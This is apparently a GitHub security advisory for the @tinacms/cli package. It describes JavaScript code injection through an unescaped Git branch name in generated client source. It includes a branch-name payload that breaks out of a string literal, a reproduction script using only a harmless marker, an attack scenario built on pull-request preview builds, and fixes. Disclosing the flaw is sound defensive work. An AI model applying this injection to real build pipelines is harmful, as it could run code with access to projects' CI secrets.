{"id":"GHSA-pwhx-cvv3-qj5c","summary":"Tina: Code injection via unescaped Git branch name in generated client source","details":"### Summary\n\n`@tinacms/cli` inserts the raw Git branch value into the generated `client.ts` source without escaping or encoding. A Git-valid branch name can close the string literal and inject an arbitrary JavaScript expression that executes when the consumer build imports the generated client module.\n\n### Affected component\n\n- **Source (branch read):** `packages/@tinacms/cli/src/cmds/init/templates/config.ts` lines 155–172 — reads `VERCEL_GIT_COMMIT_REF`, `GITHUB_BRANCH`, or `HEAD` into `config.branch`\n- **Transform (URL build):** `packages/@tinacms/cli/src/next/codegen/index.ts` lines 219–253 — `_createApiUrl()` concatenates the raw branch into the API URL with no `encodeURIComponent`\n- **Sink (template):** `packages/@tinacms/cli/src/next/codegen/index.ts` lines 363–381 — `genClient()` interpolates the URL into `url: '${apiURL}'`\n- **Sibling sink:** `packages/@tinacms/cli/src/next/codegen/codegen/plugin.ts` line 55 — `url: \"${apiURL}\"` (same pattern, double quotes)\n\n### Root cause\n\nThe codegen template at `index.ts:376` uses:\n\n```ts\nurl: '${apiURL}'\n```\n\nwhere `apiURL` contains the raw branch name. No `JSON.stringify`, `encodeURIComponent`, or string-escape function is applied at any point in the pipeline. A single quote in the branch name closes the string literal and allows expression injection.\n\n### Payload\n\nThe following is a valid Git branch name (`git check-ref-format` accepts it):\n\n```\nx'+(globalThis.__TINA_PROBE='hit')+'\n```\n\n### Generated source (sink)\n\nWhen codegen runs with this branch, the generated `client.ts` contains:\n\n```ts\nexport const client = createClient({\n  url: 'https://content.tinajs.io/2.4/content/\u003cclientId\u003e/github/x'+(globalThis.__TINA_PROBE='hit')+'',\n  token: '\u003ctoken\u003e',\n  queries,\n});\n```\n\nThe `'` in the branch name closes the URL string. `+(globalThis.__TINA_PROBE='hit')+` is parsed as a JavaScript expression. The trailing `+'` reopens a string to keep the syntax valid.\n\n### Steps to reproduce\n\n**Prerequisites:** Node.js, Git, npm\n\n```bash\nmkdir /tmp/tinacms-repro && cd /tmp/tinacms-repro\ngit init && git commit --allow-empty -m \"init\"\ngit branch \"x'+(globalThis.__TINA_PROBE='hit')+'\"\nnpm init -y && npm install esbuild\n```\n\nCreate `repro.mjs`:\n\n```js\nimport { transform } from 'esbuild';\nimport vm from 'vm';\n\n// Simulate VERCEL_GIT_COMMIT_REF containing the malicious branch\nconst branch = \"x'+(globalThis.__TINA_PROBE='hit')+'\";\n\n// _createApiUrl() logic from index.ts:252\nconst apiURL = `https://content.tinajs.io/2.4/content/my-client/github/${branch}`;\n\n// genClient() template from index.ts:376\nconst generated = `\nimport { createClient } from \"tinacms/dist/client\";\nexport const client = createClient({ url: '${apiURL}', token: 'xxx' });\n`;\n\nconsole.log(\"Generated source:\\n\", generated);\n\n// Compile (same as consumer build)\nconst compiled = await transform(generated, { loader: 'ts', format: 'cjs' });\n\n// Execute in sandboxed VM\nconst sandbox = {\n  globalThis: {},\n  module: { exports: {} },\n  exports: {},\n  require: () =\u003e ({ createClient: (o) =\u003e o }),\n};\nvm.createContext(sandbox);\nvm.runInContext(compiled.code, sandbox);\n\nconsole.log(\"__TINA_PROBE =\", sandbox.globalThis.__TINA_PROBE);\n// Output: __TINA_PROBE = hit\n```\n\nRun: `node repro.mjs`\n\n**Result:** `globalThis.__TINA_PROBE` is set to `'hit'`, confirming the injected expression executed during module evaluation.\n\n**Negative control:** Repeating with `branch = \"feature/safe-branch\"` does not trigger injection.\n\n### Impact\n\nThe injected expression executes with the full privileges of the consumer build process. In a typical Vercel or GitHub Actions preview deployment:\n\n- **Build environment variables** are accessible (`process.env`), which may include `NPM_TOKEN`, `VERCEL_TOKEN`, cloud provider secrets, and API keys\n- **Build artifacts** can be modified, enabling supply-chain compromise of the deployed output\n- **Network access** is available to exfiltrate data\n\n**Attack scenario:** An attacker opens a pull request to any open-source project that uses TinaCMS with preview deployments enabled (Vercel auto-deploys every PR branch). The attacker's branch name contains the payload. The preview build runs Tina codegen, generates the injected `client.ts`, and the attacker's code executes during the build.\n\n**Preconditions:**\n1. Attacker can create a branch or PR that triggers a consumer build\n2. Consumer uses TinaCMS with the scaffolded branch config (reading from `VERCEL_GIT_COMMIT_REF` or equivalent)\n3. Tina SDK codegen is enabled (default)\n\n### Severity rationale\n\n**High** — build-time arbitrary code execution via a controlled Git ref. Critical was not claimed because no real secret exfiltration or release artifact tampering was demonstrated in this proof; only a benign marker was used.\n\n### Suggested fix\n\n1. Use `JSON.stringify(value)` to safely serialize any runtime value interpolated into generated source templates\n2. Apply `encodeURIComponent()` to the branch value before constructing the API URL path segment\n3. Apply the same treatment to `apiURL`, `token`, `errorPolicy`, `cacheDir`, and the sibling `AddGeneratedClientFunc` template in `plugin.ts`\n4. Consider moving runtime values out of source templates entirely — pass them through a JSON config file that the generated client reads at runtime\n\n### Related advisory\n\n[GHSA-4936-9hrh-qqpw](https://github.com/advisories/GHSA-4936-9hrh-qqpw) — TinaCMS Forestry migration generated-source RCE. Different source (Forestry YAML labels), different parser (`__TINA_INTERNAL__` unquoting helper), and different sink (`tina/templates.ts`). This report is not a duplicate.","aliases":["CVE-2026-108259"],"modified":"2026-10-09T21:15:04.859057455Z","published":"2026-10-09T20:56:52Z","database_specific":{"cwe_ids":["CWE-94"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-10-09T20:56:52Z","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-pwhx-cvv3-qj5c"},{"type":"WEB","url":"https://github.com/tinacms/tinacms/pull/7526"},{"type":"WEB","url":"https://github.com/tinacms/tinacms/commit/d030d414d39e15de79bf36e4c728d57205e71dde"},{"type":"PACKAGE","url":"https://github.com/tinacms/tinacms"},{"type":"WEB","url":"https://github.com/tinacms/tinacms/releases/tag/@tinacms/cli@3.0.0"}],"affected":[{"package":{"name":"@tinacms/cli","ecosystem":"npm","purl":"pkg:npm/%40tinacms/cli"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.0.0"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 2.7.0","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-pwhx-cvv3-qj5c/GHSA-pwhx-cvv3-qj5c.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"}]}